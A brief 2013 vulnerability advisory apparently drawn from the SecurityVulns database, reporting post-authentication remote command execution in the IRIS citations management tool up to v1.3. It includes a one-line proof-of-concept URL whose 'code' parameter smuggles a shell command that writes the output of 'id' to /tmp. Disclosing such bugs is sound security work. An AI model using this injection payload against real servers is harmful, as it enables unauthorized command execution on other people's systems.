I Read It Somewhere (IRIS) citations management tool <= v1.3 (post auth) Remote Command Execution

2013-02-18T00:00:00
ID SECURITYVULNS:DOC:29057
Type securityvulns
Reporter Securityvulns
Modified 2013-02-18T00:00:00

Description

A vulnerability exists in IRIS citations management tool which allows a low privileged attacker to execute arbitrary commands.

Details can be found on my blog: https://infosecabsurdity.wordpress.com/2013/02/09/iris-citations-management-tool-post-auth-remote-command-execution/

PoC:

http://[target]/[path]/index.php?p=add&import=spnro&code=a"+-T+0.1+||echo+`id`+>+/tmp/luls||"

~ aeon